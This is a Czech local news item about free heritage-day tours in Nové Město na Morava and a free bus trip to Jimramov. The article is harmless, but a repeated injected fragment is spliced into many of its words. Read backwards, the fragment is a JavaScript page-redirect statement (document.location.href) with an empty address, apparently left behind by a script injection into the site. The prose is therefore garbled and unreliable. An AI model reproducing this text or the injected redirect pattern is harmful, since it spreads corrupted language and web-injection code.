Rainbow page separator

Památky se opět otevřou veřejnosti, zájemce čeká i zájezd

Neděle, 5. září 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Den otevřených dveří památek u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí zářijových Dnů evropského dědictví připravují v Novém Městě. Uskuteční se v sobotu 11. září s přetahem do neděle 12. září. V sobotu se návštěvníkům zdarma otevřou brány nejzajímavějších památek, objektů a pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i těch, které jsou jinak zčásti nebo zcela nepřístupné. Lidé dostanou možnost bezplatně zavítat do expozic Horáckého muzea i Horácké galerie na Vratislavově náměstí. Komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované prohlídky se v muzeu uskuteční od 10 do 10.45 hodin, v galerii od 11 do 11.45 hodin a od 14 do 15.30 hodin se zájemci mohou zúčastnit procházky po zaniklých prvorepublikových živnostech se srazem u muzea. Volně přístupný bude od půl čtvrté odpoledne do sedmnácti hodin taktéž evangelický kostel a věž i Galerie Sokolíček na Vratislavově náměstí. Sobotní program v době od 17 do 18 hodin završí komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná prohlídka výstavy Ivy Němcové v Horáckém muzeu.
Nedělní nabídka pak představuje bezplatný zájezd za památkami, ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát směrovaný do nedalekého Jimramova. Odjezd bude v neděli 12. září ve 14 hodin z novoměstského au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusového nádraží – lidé se na zájezd mohou hlásit přes web nebo telefon muzea, případně osobně v infocentru na Vratislavově náměstí.